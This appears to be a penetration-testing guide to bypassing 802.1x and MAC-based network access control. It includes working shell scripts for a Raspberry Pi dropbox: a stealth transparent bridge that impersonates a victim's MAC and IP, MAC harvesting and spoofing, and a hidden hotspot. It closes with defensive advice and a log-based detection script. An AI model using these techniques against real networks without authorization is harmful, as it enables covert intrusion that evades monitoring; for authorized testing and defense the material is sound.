Network Access Control
Bypassing Network Access Control Systems
NAC (Network Access Control) acts as a gatekeeper to the local network infrastructure. It usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices off the network.
NAC is a principle rather than a single product. It can be implemented with several measures:
Filtering of MAC addresses
Authentication with username & password
Authentication with certificates
Fingerprinting
Host checks
NAC aims at protecting against scenarios including, but not limited to, the following:
Employees bringing rogue devices (willingly or not)
Service providers acting inside the IT / OT network*
Attackers trying to gain access to the internal network
*IT/OT network: Information Technology (workstations, users, shares, ...) and Operational Technology (machines, production lines, ...).
The supplicant: the client asking for network access.
The authenticator: the device acting as the gatekeeper, to which the client connects - most likely a switch.
The authentication server: a system in the background that validates the requests and grants or denies access to the supplicant.
EAPOL frames carry the EAP exchange from the supplicant (the client desiring access to the network) to the authenticator (the switch).
The switch unpacks the EAPOL frame and forwards the EAP packet to the authentication server, which in most cases is a RADIUS server (the EAP payload travels inside RADIUS attributes).
From there everything goes the other way round. As EAP is more a framework than a protocol, it defines several EAP methods for authentication. Commonly known variants are EAP-TLS, EAP-MD5, EAP-PSK and EAP-IKEv2, allowing authentication by certificates, passwords, pre-shared keys or other mechanisms; PEAP and EAP-TTLS, which tunnel an inner method inside TLS, are also widespread in enterprise deployments. EAP-MD5 authenticates only the client and derives no keys, so it should not be relied on.
Once all checks pass, the port is switched to the authorized state and normal network traffic is allowed.
A device known as a "dropbox" is needed to carry out such attacks during NAC penetration tests. The following setup is commonly used for this type of engagement.
Raspberry Pi 4 8GB
SD card
3.5” TFT with Case
Additional USB Ethernet adapter
Power adapter
Keyboard
(optional) Powerbank
(optional) LTE USB modem
The integrated wireless interface can be used to spawn a hotspot so the dropbox can be reached over SSH without plugging anything else into it.
The necessary libraries and tools (DHCP server, hostapd, bridging and filtering utilities, sniffers) can then be installed.
The DHCP configuration file is located at /etc/dhcp/dhcpd.conf and determines how the dropbox acts as a DHCP server.
The host access point daemon (hostapd) configuration file is located at /etc/hostapd/hostapd.conf and determines how the dropbox acts as a wireless access point.
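As an added example (not the original page's commands), the following script generates both files for the management hotspot. The SSID, passphrase, subnet and interface name are assumptions; the Pi is assumed to run hostapd and ISC dhcpd (the isc-dhcp-server package), which is what the two paths above imply.

```shell
#!/bin/sh
# Added example for this page (not the original's commands): generate the hostapd
# and ISC dhcpd configuration for the dropbox's management hotspot. The SSID,
# passphrase, subnet and interface name are assumptions; adjust them before use.
# Run as root with "--apply" to write the files and (re)start both services.

AP_IF="wlan0"                 # assumed: the Pi's built-in wireless interface
AP_SSID="dropbox-mgmt"
AP_PSK="change-me-to-a-long-random-passphrase"
AP_NET="10.10.10"             # hotspot subnet 10.10.10.0/24; the dropbox is .1

hostapd_conf() {
    cat <<EOF
interface=$AP_IF
driver=nl80211
ssid=$AP_SSID
hw_mode=g
channel=6
ieee80211n=1
# WPA2-PSK/CCMP only: an open or WPA1 hotspot would hand the dropbox to anyone nearby
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
rsn_pairwise=CCMP
wpa_passphrase=$AP_PSK
# do not advertise the SSID; nothing about the dropbox should be visible
ignore_broadcast_ssid=1
EOF
}

dhcpd_conf() {
    cat <<EOF
# ISC dhcpd: serve leases on the hotspot subnet only, never on the wired side
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $AP_NET.0 netmask 255.255.255.0 {
    range $AP_NET.100 $AP_NET.150;
    option routers $AP_NET.1;
    option broadcast-address $AP_NET.255;
}
EOF
}

apply() {
    hostapd_conf > /etc/hostapd/hostapd.conf
    dhcpd_conf > /etc/dhcp/dhcpd.conf
    # restrict isc-dhcp-server to the hotspot interface (Debian / Raspberry Pi OS)
    sed -i "s/^INTERFACESv4=.*/INTERFACESv4=\"$AP_IF\"/" /etc/default/isc-dhcp-server
    ip addr replace "$AP_NET.1/24" dev "$AP_IF"
    systemctl restart hostapd isc-dhcp-server
}

if [ "${1:-}" = "--apply" ]; then
    apply
fi
```

The DHCP server is deliberately bound to the wireless interface only: a dropbox that answers DHCP on the wired side would announce itself to the very network it is supposed to blend into. On Raspberry Pi OS, dhcpcd or NetworkManager may also try to manage wlan0 and must be told to leave it alone (an assumption about the image in use).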
There are several scenarios to take into consideration, each with specific bypass possibilities.
Companies usually have devices that don't fully support 802.1x, such as printers, VoIP equipment or cameras. These are usually granted access to the network only by having their MAC address in a whitelist. This is often dubbed "MAC-based NAC" (or MAC Authentication Bypass, MAB, in Cisco terminology).
MAC-based and 802.1x are usually combined in one of several ways:
by setting up each physical RJ45 port (i.e. the authenticator) in the building to do either MAC-based NAC or 802.1x;
by having the authenticator (i.e. the port) check whether the connecting device supports 802.1x and falling back to MAC-based NAC if it doesn't;
by mixing MAC-based and authentication (i.e. 802.1x): the MAC address is checked and authentication then takes place. In this case, access to the network is granted only if the supplicant's MAC address is whitelisted and the authentication then succeeds.
Use a hub, change the dropbox's MAC address to the victim's, and connect both the dropbox and the victim to the same Ethernet port. The "real" device will do the authentication, putting the port into authorized mode, and both devices get to talk to the network. As both share the same MAC, the switch will only have one entry in its MAC address (CAM/SAT) table, not raising suspicion. Keep the dropbox quiet (no DHCP client, no mDNS/LLMNR chatter) so its traffic does not stand out next to the victim's.
This idea involves a device that, simply put, first lets all traffic traverse it by means of forwarding rules, being totally transparent to the network and all participants. It then uses tcpdump to sniff traffic such as ARP, NetBIOS, Kerberos, Active Directory and web traffic, extracting the information needed to impersonate the victim towards the network and its gateway while staying under the radar. With this information the needed ebtables, iptables etc. rules are created automatically, allowing the attacker to interact with the network while mimicking the victim.
The steps are as follows:
find a target device and put the dropbox in between
start the nac_bypass_setup.sh script
wait until the script has gathered the MAC address of the attacked system, the IP of the attacked system and the gateway's MAC address, which it needs to perform the attack. If all went well, the script reports these values and the device should be able to talk to the network.
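The rule set such a script ends up applying can be reproduced by hand. The following is an added example written for this page, not the tool's own script. It assumes eth0 faces the switch and eth1 faces the victim, that the victim's MAC/IP and the gateway MAC have already been read off the wire, and it uses a link-local address and a high source-port range that are arbitrary choices.

```shell
#!/bin/sh
# Added example for this page, not the tool's own script: bring up a transparent
# bridge and emit the ebtables/iptables rules that let the dropbox talk to the
# network while looking like the victim. Assumptions: eth0 faces the switch,
# eth1 faces the victim, the victim MAC/IP and gateway MAC are already known
# (read off the wire with tcpdump on eth1), and the link-local address and the
# NAT source-port range below are arbitrary choices that must not collide with
# anything the victim itself uses.

SW_IF="eth0"            # uplink to the switch (the authenticator)
VICTIM_IF="eth1"        # USB adapter towards the victim (the supplicant)
BR_IF="br0"
BR_IP="169.254.66.66"   # dropbox address; never appears on the wire after SNAT
FAKE_GW="169.254.66.1"  # stand-in next hop, statically mapped to the real gateway MAC
NAT_PORTS="61000-62000" # source ports reserved for the dropbox's own connections

bridge_up() {
    ip link add name "$BR_IF" type bridge
    ip link set "$BR_IF" type bridge stp_state 0      # never send BPDUs
    ip link set "$SW_IF" master "$BR_IF"
    ip link set "$VICTIM_IF" master "$BR_IF"
    # A bridge drops 802.1X EAPOL (01:80:C2:00:00:03) by default; bit 3 of
    # group_fwd_mask lets the victim's authentication pass through us.
    echo 8 > "/sys/class/net/$BR_IF/bridge/group_fwd_mask"
    # Bridged frames must traverse iptables for the SNAT below to apply.
    modprobe br_netfilter
    sysctl -q -w net.bridge.bridge-nf-call-iptables=1
    for i in "$SW_IF" "$VICTIM_IF" "$BR_IF"; do
        sysctl -q -w "net.ipv6.conf.$i.disable_ipv6=1"   # no RS/NS with our own MAC
        ip link set "$i" arp off                          # no ARP with our own MAC either
        ip link set "$i" up
    done
}

# gen_rules VICTIM_MAC VICTIM_IP GW_MAC BRIDGE_MAC: print the impersonation rules.
# Layer 2: every frame we originate leaves with the victim's MAC (one rule for the
# physical uplink, one for the bridge device, which ebtables treats as separate
# out-interfaces). Layer 3: our flows are SNATed to the victim's IP on a port range
# the victim does not use, so conntrack can hand the replies back to us.
gen_rules() {
    vmac=$1; vip=$2; gmac=$3; bmac=$4
    cat <<EOF
ip addr add $BR_IP/24 dev $BR_IF
ip neigh add $FAKE_GW lladdr $gmac dev $BR_IF nud permanent
ip route add default via $FAKE_GW dev $BR_IF
ebtables -t nat -A POSTROUTING -s $bmac -o $SW_IF -j snat --to-src $vmac
ebtables -t nat -A POSTROUTING -s $bmac -o $BR_IF -j snat --to-src $vmac
iptables -t nat -A POSTROUTING -o $BR_IF -s $BR_IP -p tcp -j SNAT --to-source $vip:$NAT_PORTS
iptables -t nat -A POSTROUTING -o $BR_IF -s $BR_IP -p udp -j SNAT --to-source $vip:$NAT_PORTS
iptables -t nat -A POSTROUTING -o $BR_IF -s $BR_IP -p icmp -j SNAT --to-source $vip
EOF
}

apply_rules() {
    gen_rules "$1" "$2" "$3" "$(cat "/sys/class/net/$BR_IF/address")" | sh -e
}

case "${1:-}" in
    up)    bridge_up ;;
    rules) apply_rules "$2" "$3" "$4" ;;
esac
```

Usage: `./bridge.sh up` first, then watch `tcpdump -i eth1 -e -nn -c 50 'arp or ip'` for the victim's MAC/IP as source, and the frames arriving through eth0 for off-subnet destinations carry the gateway's MAC; then `./bridge.sh rules <victim_mac> <victim_ip> <gw_mac>`. The fake next hop avoids having to learn the gateway's IP at all, and disabling ARP and IPv6 on all three interfaces is what keeps the dropbox's real MAC off the wire before the ebtables rules are in place.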
In general an 802.1x implementation will prevent employees or service providers from connecting rogue devices to the network. To a certain extent it may also block script kiddies who lack the skills to bypass it. Against more advanced adversaries, the attacks described above will most likely succeed.
Here are some general guidelines for keeping things as secure as possible:
Separate devices that authenticate by MAC only into their own network segment.
Reduce the re-authentication interval to limit the hub attack scenario. A port left authorized for an hour after a successful 802.1x authentication poses a much higher risk than one that re-authenticates every 5 minutes.
Use MACsec (802.1AE, keyed via MKA after the 802.1x exchange) if possible; both the switch port and the client NIC/driver must support it. It will at least make it much harder for an attacker to gather the information needed to play man in the middle.
Monitoring:
Uncommon link up/downs on switches
Speed / duplex changes
Changes in frame sizes (e.g. Windows vs Linux)
Changed TTLs
Access to systems and services that normally don't get accessed (firewall logs)
Monitor network traffic and detect attacks / unknown patterns (IDS/IPS/SIEM)
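Two of these signals can be pulled straight out of switch syslog. The following is an added example (not part of the original page) over constructed log lines in the usual Cisco IOS message style; the hostname, ports, VLAN and MAC addresses are made up. It flags ports that go down repeatedly within a short window (a cable being moved to a hub or a bridge) and MAC addresses the switch reports as flapping between ports (a spoofed MAC while the real device is still connected elsewhere).

```shell
#!/bin/sh
# Added example for this page (not from the original): pull two of the signals
# above out of switch syslog. The log lines are constructed in the usual Cisco
# IOS message style; hostname, ports, VLAN and MACs are made up.

SWITCH_LOG='Jan 12 09:14:02 sw-floor2 1234: %LINK-3-UPDOWN: Interface GigabitEthernet1/0/12, changed state to down
Jan 12 09:14:05 sw-floor2 1235: %LINK-3-UPDOWN: Interface GigabitEthernet1/0/12, changed state to up
Jan 12 09:14:06 sw-floor2 1236: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet1/0/12, changed state to up
Jan 12 09:14:40 sw-floor2 1237: %LINK-3-UPDOWN: Interface GigabitEthernet1/0/12, changed state to down
Jan 12 09:14:44 sw-floor2 1238: %LINK-3-UPDOWN: Interface GigabitEthernet1/0/12, changed state to up
Jan 12 09:30:11 sw-floor2 1240: %LINK-3-UPDOWN: Interface GigabitEthernet1/0/7, changed state to down
Jan 12 09:31:20 sw-floor2 1242: %SW_MATM-4-MACFLAP_NOTIF: Host 001e.8faa.bbcc in vlan 20 is flapping between port Gi1/0/7 and port Gi2/0/3'

# flap_report THRESHOLD WINDOW_SECONDS: ports with at least THRESHOLD link-down
# events inside WINDOW_SECONDS. Timestamps are taken from the syslog time field
# (field 3), so a run that spans midnight needs the date as well.
flap_report() {
    awk -v thr="${1:-2}" -v win="${2:-600}" '
    /%LINK-3-UPDOWN: Interface .* changed state to down/ {
        split($3, t, ":"); s = t[1]*3600 + t[2]*60 + t[3]
        split($0, p, "Interface "); split(p[2], q, ","); ifn = q[1]
        if (!(ifn in first)) first[ifn] = s
        last[ifn] = s; downs[ifn]++
    }
    END {
        for (i in downs)
            if (downs[i] >= thr && last[i] - first[i] <= win)
                printf "ALERT %s: %d link-down events within %ds\n", i, downs[i], last[i] - first[i]
    }' | sort
}

# macflap_report: one alert per MAC-flapping notification, with the ports involved.
macflap_report() {
    awk '/%SW_MATM-4-MACFLAP_NOTIF/ {
        ports = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "Host") host = $(i + 1)
            if ($i == "vlan") vlan = $(i + 1)
            if ($i == "port") ports = ports " " $(i + 1)
        }
        printf "ALERT %s vlan %s: seen on%s\n", host, vlan, ports
    }'
}

# Run over the constructed sample: printf '%s\n' "$SWITCH_LOG" | flap_report 2 600
```

Both functions read syslog on stdin, so they work equally on a saved file or on a live feed. The threshold and window are tuning knobs: a single link-down is normal life, two within a minute on a printer port that never moves is worth a look, especially if a successful 802.1x authentication follows immediately afterwards.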
Unneeded ports must be disabled/disconnected.
Don't expose unneeded info. Stickers with IP/MAC addresses will make it much easier for an attacker. The same goes for access to IP phone or printer menus to gather network intel. Restrict them as much as possible.
Restrict physical access to the systems. If someone is not able to get in between, they can't carry out these attacks.
Awareness: train employees to ask questions and inform people when they see a suspicious device hanging off a printer or similar.
Most commonly, NAC solutions are based on 802.1x, a standard for port-based network access control. The NAC solution interacts with the switches (mainly via RADIUS, often complemented by SNMP) and authorizes or blocks ports based on the preset rules. There are 3 actors involved: the supplicant, the authenticator and the authentication server.
By default, the ports are in an unauthorized state and will only be allowed to transmit and receive EAPOL frames (Extensible Authentication Protocol over LAN), which is basically EAP encapsulated in Ethernet frames.
An infrastructure capable of talking 802.1x is needed for all this to work properly: supplicants (i.e. clients), authenticators (i.e. switches) and authentication servers (i.e. RADIUS servers).
A short overview from Gartner lists and reviews many NAC solutions.
The Raspberry Pi's SD card can be flashed with the usual imaging tools.
Purpose-built implant devices can also be helpful in NAC-bypass engagements. Nota bene: keep in mind that ghosted Linux machines will require custom iptables rules to work smoothly.
Bypassing MAC-based NAC can be done by spoofing an authorized MAC address.
The first step is to find one. This can be done by physically reading addresses off printers, labels, IP phones and similar equipment, or by using a sniffer to manually inspect the broadcast and multicast packets travelling on the network and pick MAC addresses out of the traffic.
A tool such as macchanger (or plain ip link) can then be used to spoof that address. Once done, cables can be swapped to access the customer's network.
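As an added example for both the MAC-based bypass and the hub attack above (not the page's own commands), the following extracts candidate MAC/IP pairs from the output of `tcpdump -e -nn` and then applies a chosen address to the dropbox's wired interface. The capture lines are constructed; the interface name is an assumption.

```shell
#!/bin/sh
# Added example for this page (not the original's commands): harvest candidate
# MAC/IP pairs from what tcpdump sees on the wire, then take one over on the
# dropbox's wired interface. The capture lines below are constructed in the
# format of "tcpdump -e -nn"; the interface name is an assumption.

IFACE="eth0"

SAMPLE_CAPTURE='12:00:01.000000 00:1e:8f:aa:bb:cc > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Request who-has 10.0.0.1 tell 10.0.0.40, length 46
12:00:01.500000 3c:52:82:12:34:56 > 01:00:5e:00:00:fb, ethertype IPv4 (0x0800), length 100: 10.0.0.23.5353 > 224.0.0.251.5353: UDP, length 58
12:00:02.000000 00:1e:8f:aa:bb:cc > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Request who-has 10.0.0.1 tell 10.0.0.40, length 46
12:00:03.000000 3c:52:82:12:34:56 > 00:00:5e:00:01:01, ethertype IPv4 (0x0800), length 74: 10.0.0.23.49152 > 10.0.0.5.445: Flags [S], seq 1, win 64240, length 0'

# harvest_macs: read "tcpdump -e -nn" lines on stdin, print "SRC_MAC SRC_IP COUNT"
# for every source seen. ARP gives the IP via "tell X", IPv4 via "X.port >".
harvest_macs() {
    awk '
    /ethertype ARP/ {
        ip = "?"
        if (match($0, /tell [0-9.]+/)) ip = substr($0, RSTART + 5, RLENGTH - 5)
        seen[$2 " " ip]++
    }
    /ethertype IPv4/ {
        ip = "?"
        if (match($0, /: [0-9.]+ >/)) {
            ip = substr($0, RSTART + 2, RLENGTH - 4)
            sub(/\.[0-9]+$/, "", ip)          # drop the port
        }
        seen[$2 " " ip]++
    }
    END { for (k in seen) print k, seen[k] }' | sort
}

# live_harvest: the same over 500 real frames; broadcast and multicast alone is
# enough to see printers, phones and workstations announce themselves.
live_harvest() {
    tcpdump -i "$IFACE" -e -nn -l -c 500 'arp or broadcast or multicast' 2>/dev/null | harvest_macs
}

# spoof_mac MAC: take over the chosen address. Change it while the link is down
# so the switch never sees the dropbox's real MAC come up on the port.
spoof_mac() {
    ip link set dev "$IFACE" down
    ip link set dev "$IFACE" address "$1"
    ip link set dev "$IFACE" up
}

# Constructed sample: printf '%s\n' "$SAMPLE_CAPTURE" | harvest_macs
# prints one line per source, e.g. the printer 00:1e:8f:aa:bb:cc at 10.0.0.40.
```

The MAC is only the first layer of the disguise: a dropbox that claims a printer's address but sends a Linux DHCP vendor class, a different TTL or mDNS/LLMNR announcements still looks wrong to anyone watching, and if the real device stays plugged into another port the switch will log the address flapping between ports. In the hub attack the real device keeps its port, so the dropbox should stay silent on those protocols and only use the shared MAC for what it needs.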
For pure 802.1x, the approach is the same, without the MAC-based verification to bypass.
A regular authentication to 802.1x (and similar) systems can be conducted with a standard supplicant such as wpa_supplicant.
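As an added example (not the page's own configuration), this is what a regular wired 802.1x authentication from the dropbox looks like with wpa_supplicant, for EAP-TLS and for PEAP/MSCHAPv2. Identity, file paths and the interface name are assumptions; the certificate or credentials must be ones the customer's RADIUS server accepts, e.g. issued for the engagement.

```shell
#!/bin/sh
# Added example for this page, not from the original: authenticate the dropbox
# itself against a wired 802.1x port with wpa_supplicant. Identity, file paths
# and the interface name are assumptions; the certificate or credentials must
# be ones the customer's RADIUS server accepts (e.g. issued for the engagement).

IFACE="eth0"
CONF="/tmp/wired-8021x.conf"

# EAP-TLS: client certificate, the normal choice for machine authentication.
# ap_scan=0 and eapol_flags=0 are the wired settings (no scanning, no WEP keys).
wired_eap_tls_conf() {
    cat <<'EOF'
ctrl_interface=/var/run/wpa_supplicant
ap_scan=0
network={
    key_mgmt=IEEE8021X
    eap=TLS
    identity="dropbox@corp.example"
    ca_cert="/etc/8021x/corp-ca.pem"
    client_cert="/etc/8021x/dropbox.pem"
    private_key="/etc/8021x/dropbox.key"
    eapol_flags=0
}
EOF
}

# PEAP/MSCHAPv2: username and password. ca_cert is not optional: without it the
# supplicant will happily run the MSCHAPv2 exchange against a rogue authenticator.
wired_peap_conf() {
    cat <<'EOF'
ctrl_interface=/var/run/wpa_supplicant
ap_scan=0
network={
    key_mgmt=IEEE8021X
    eap=PEAP
    identity="jdoe@corp.example"
    password="assumed-password"
    ca_cert="/etc/8021x/corp-ca.pem"
    phase2="auth=MSCHAPV2"
    eapol_flags=0
}
EOF
}

# authenticate tls|peap: write the chosen config and run the wired supplicant
authenticate() {
    case "$1" in
        tls)  wired_eap_tls_conf > "$CONF" ;;
        peap) wired_peap_conf > "$CONF" ;;
        *)    echo "usage: $0 tls|peap" >&2; return 1 ;;
    esac
    chmod 600 "$CONF"
    # -D wired selects the EAPOL-over-Ethernet driver; -d shows EAP-Success/Failure
    wpa_supplicant -D wired -i "$IFACE" -c "$CONF" -d
}

if [ -n "${1:-}" ]; then
    authenticate "$1"
fi
```

Running this legitimately against a test port is also the quickest way to confirm which EAP methods the customer's RADIUS server actually offers: the debug output lists the method the server proposes before the client answers.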
Just like with the MAC-based bypass, the first step is to find an authorized MAC address.
The second step is to access the port without authenticating, which leaves at least two possible ways (the hub attack and the transparent bridge described above), both relying on a man-in-the-middle position.
There is a tool that automates the transparent-bridge approach; its author walks through it in a blog post.
From that position, other offensive tools can then be run from the dropbox.